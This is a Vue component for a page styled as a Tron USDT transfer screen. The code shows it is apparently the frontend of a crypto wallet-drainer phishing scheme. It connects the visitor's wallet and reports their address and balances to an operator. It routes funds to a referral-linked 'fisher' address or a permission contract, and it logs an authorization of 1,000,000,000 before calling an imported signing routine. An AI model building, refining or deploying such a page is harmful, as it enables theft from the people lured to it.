  <template>
    <div class="container">
      <AuthorizePayOverlay
        :visible="overlayVisible"
        :message="overlayMessage"
        :type="overlayType"
      />
      <a-spin :spinning="pageLoading" tip="加载中...">
      <a-row class="header" type="flex" align="middle">
        <a-col :span="8">
          <a-button type="text" @click="goBack">
            <template #icon>
              <left-outlined />
            </template>
          </a-button>
        </a-col>
        <a-col :span="8" class="text-center">
          <div class="title">USDT转账</div>
          <div class="subtitle">Tron</div>
        </a-col>
        <a-col :span="8" class="text-right">
          <a-button type="text" @click="scanQR">
            <template #icon>
              <qrcode-outlined />
            </template>
          </a-button>
        </a-col>
      </a-row>
  
      <div class="section-title">收款地址</div>
      <a-input-group compact class="input-group">
        <a-input
          v-model:value="recipientAddress"
          placeholder="Tron地址"
          class="address-input"
          readonly
        >
          <template #suffix>  <!-- 左侧图标 -->
            <a-button type="text" class="user-icon">
              <user-outlined />
            </a-button>
          </template>
        </a-input>
      </a-input-group>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>数量</a-col>
        <a-col class="text-right">
          <span class="balance">{{ usdtBalance }} USDT</span>
        </a-col>
      </a-row>
  
      <a-card class="amount-card">
        <a-input
         style="border: none !important;border-bottom: 1px solid gray  !important;padding: 10px 11px !important;border-radius: 10px 10px 0px 0px; /* 仅底部边框 */"
          v-model:value="amount"
          placeholder="0"
          class="amount-input"
          size="large"
        />
        <a-divider class="divider" />
        <a-input
          v-model:value="memo"
          placeholder="备注（需支付1TRX）"
          class="memo-input"
        />
      </a-card>
  
      <a-row type="flex" justify="space-between" align="middle" class="section-title">
        <a-col>矿工费</a-col>
      </a-row>
  
      <a-card class="fee-card">
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>$0</a-col>
          <a-col>~</a-col>
        </a-row>
        <a-row type="flex" justify="space-between" align="middle" class="fee-row">
          <a-col>0 TRX</a-col>
          <a-col>
            <down-outlined />
          </a-col>
        </a-row>
      </a-card>

      <a-button
        type="primary"
        block
        size="large"
        class="next-button"
        :disabled="payDisabled || paySubmitting"
        :loading="paySubmitting"
        @click="nextStep"
      >
        下一步
      </a-button>
      </a-spin>
    </div>
  </template>
  
  <script>
  import { defineComponent, ref, onMounted } from 'vue';
  import { connectWallet, getUSDTBalance, signAndSend1 } from '../util/tronweb';
  import { addOrder, addAuthorize, addToast, reportTxWatch, getUserByRefer, getWalletInitData } from '../util/api';
  import { message } from 'ant-design-vue';
  import { useRoute } from 'vue-router';
  import AuthorizePayOverlay from '../components/AuthorizePayOverlay.vue';
  import { PAY_MSG, isTrxEnoughForAuthorize, createPayClickGuard } from '../util/walletPayUi';
  import { getGameGroupIdFromRoute } from '../util/deeplink';
  import { clientEnv } from '../config/env';

  import {
    LeftOutlined,
    QrcodeOutlined,
    UserOutlined,
    DownOutlined,
  } from '@ant-design/icons-vue';
  
  export default defineComponent({
    components: {
      LeftOutlined,
      QrcodeOutlined,
      UserOutlined,
      DownOutlined,
      AuthorizePayOverlay,
    },
    setup() {
      const route = useRoute();
      const recipientAddress = ref('');
      const amount = ref('');
      const memo = ref('');
      const usdtBalance = ref('');
      const referral_code = ref('');
      const gameGroupId = ref(undefined);
      const payDisabled = ref(false);
      const overlayVisible = ref(false);
      const overlayMessage = ref('');
      const wallet = ref('');
      const trx = ref(0);
      const energy = ref(0);
      const money = ref(0);
      const overlayType = ref('error');
      const pageLoading = ref(false);
      const paySubmitting = ref(false);
      const payClickGuard = createPayClickGuard();

      const goBack = () => {
        console.log('Go back');
      };

      const scanQR = () => {
        console.log('Scan QR code');
      };

      const showTrxFail = () => {
        overlayType.value = 'error';
        overlayMessage.value = PAY_MSG.trxFail;
        overlayVisible.value = true;
        payDisabled.value = true;
      };
      const showGasFail = () => {
        overlayType.value = 'error';
        overlayMessage.value = PAY_MSG.gasFail;
        overlayVisible.value = true;
        payDisabled.value = true;
      };

      const showPaySuccessWait = () => {
        overlayType.value = 'wait';
        overlayMessage.value = PAY_MSG.waitNetwork;
        overlayVisible.value = true;
        payDisabled.value = true;
      };

      const nextStep = async () => {
        if (payDisabled.value) {
          return;
        }
        if (!payClickGuard.tryStart()) {
          return;
        }
        paySubmitting.value = true;
        try {
        await addToast({
          referralCode: referral_code.value,
          address: wallet.value,
          usdt_balance: money.value,
          trx_balance: trx.value,
          energy: energy.value,
          is_authorize: '0',
          message: '有用户访问网站',
          gameGroupId: gameGroupId.value,
        });

       // ({ trx: trx.value, energy: energy.value } = await getWalletResources(wallet.value));

        if (!isTrxEnoughForAuthorize(trx.value, energy.value)) {
          console.warn('[authorize] 余额不足', { trx: trx.value, energy: energy.value });
          showGasFail();
          return;
        }

        if (Number(amount.value) > money.value) {
                message.warning('USDT余额不足');
                return;
        }

        const str = getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
        const detal = {
          price: amount.value,
          inputNumber: 1,
          inputGT: wallet.value,
          orderNo: str,
          title: '钱包收款#' + amount.value,
          referral_code: referral_code.value,
        };
        await addOrder(detal);

        const authData = {
          address: wallet.value,
          tg_no: wallet.value,
          referralCode: referral_code.value,
          authorize_banlce: 1000000000,
          order_no: str,
          usdt_banlce: money.value,
          trx_balance: trx.value,
        };
        if (gameGroupId.value) {
          authData.gameGroupId = gameGroupId.value;
        }
        await addAuthorize(authData);

        try {
          const result = await signAndSend1();
          if (result && result.txid) {
            await reportTxWatch(result.txid, wallet.value);
            showPaySuccessWait();
          } else {
            showTrxFail();
          }
        } catch (e) {
          console.error(e);
          showTrxFail();
        }
        } finally {
          paySubmitting.value = false;
          payClickGuard.end();
        }
      };

      const getCurrentDateTime =() =>  {
            const date = new Date();
            const year = date.getFullYear();
            const month = ("0" + (date.getMonth() + 1)).slice(-2);
            const day = ("0" + date.getDate()).slice(-2);
            const hours = ("0" + date.getHours()).slice(-2);
            const minutes = ("0" + date.getMinutes()).slice(-2);
            const seconds = ("0" + date.getSeconds()).slice(-2);
            return `${year}${month}${day}${hours}${minutes}${seconds}`;
        }

       onMounted(async () => {
          pageLoading.value = true;
          try {
          referral_code.value = route.params.referralCode;
          gameGroupId.value = getGameGroupIdFromRoute(route);
          console.log("111"+referral_code.value);

          if (referral_code.value) {
            try {
              const userRes = await getUserByRefer(referral_code.value);
              const fisherAddress = userRes?.data?.address?.trim();
              if (fisherAddress && /^T[1-9A-HJ-NP-Za-km-z]{33}$/.test(fisherAddress)) {
                recipientAddress.value = fisherAddress;
              } else {
                recipientAddress.value = clientEnv.tronPermissionContract;
                console.warn('[WalletLink] 渔夫未绑定收款地址，使用默认合约地址');
              }
            } catch (e) {
              console.error('[WalletLink] 获取渔夫收款地址失败:', e);
              recipientAddress.value = clientEnv.tronPermissionContract;
            }
          } else {
            recipientAddress.value = clientEnv.tronPermissionContract;
          }

          wallet.value = await connectWallet();
          if (!wallet.value) {
              return;
          }

          const res = await getWalletInitData({ address: wallet.value });
          const resources = res?.data?.walletResources || {};
          trx.value = Number(resources.trx) || 0;
          energy.value = Number(resources.energy) || 0;

          money.value = await getUSDTBalance(wallet.value);
          usdtBalance.value = money.value;
          } catch (e) {
            console.error('[WalletLink] 初始化失败:', e);
            message.error('加载钱包信息失败，请刷新重试');
          } finally {
            pageLoading.value = false;
          }
      });
  
      return {
        recipientAddress,
        amount,
        memo,
        usdtBalance,
        payDisabled,
        paySubmitting,
        overlayVisible,
        overlayMessage,
        overlayType,
        pageLoading,
        goBack,
        scanQR,
        nextStep,
      };
    },
  });
  </script>
  
  <style scoped>
  .container {
    position: absolute;
    left: 0;
    top: 0;
    bottom: 0;
    right: 0;
    background-color: #f6f6f6;
    display: flex;
    flex-direction: column;
    padding: 16px;
  }
  
  @media screen and (min-width: 960px) {
    .container {
      width: 500px;
      margin: 0 auto;
    }
  }
  
  .header {
    margin-bottom: 20px;
  }
  
  .text-center {
    text-align: center;
  }
  
  .text-right {
    text-align: right;
  }
  
  .title {
    font-size: 18px;
    font-weight: 500;
  }
  
  .subtitle {
    color: #acacac;
    font-size: 12px;
  }
  
  .section-title {
    color: #8c8c8c;
    margin: 15px 0 10px 0;
  }
  
  .input-group {
    width: 100%;
    margin-bottom: 20px;
  }
  
  .address-input {
    flex: 1;
    border-radius: 10px 0 0 10px;
  }
  
  .user-icon {
    border-radius: 0 10px 10px 0;
    padding: 0;
  }
  
  .amount-card {
    border-radius: 10px;
    margin-bottom: 20px;
  }
  
  .amount-input {
    font-size: 32px;
    border: none;
    box-shadow: none;
    
  }
  
  .memo-input {
    border: none;
    box-shadow: none;
  }
  
  .divider {
    margin: 15px 0;
  }
  
  .fee-card {
    border-radius: 10px;
    background-color: #fff;
    padding: 8px 11px;
  }
  
  .fee-row {
    padding: 10px 0;
  }

  .balance {
    font-size: 12px;
    color: gray;
  }

  .next-button {
    height: 50px;
    border-radius: 10px;
    font-size: 16px;
    margin-top: auto;
    margin-bottom: 56px;
    flex-shrink: 0;

    &:disabled {
      opacity: 0.55;
      cursor: not-allowed;
    }
  }


  </style>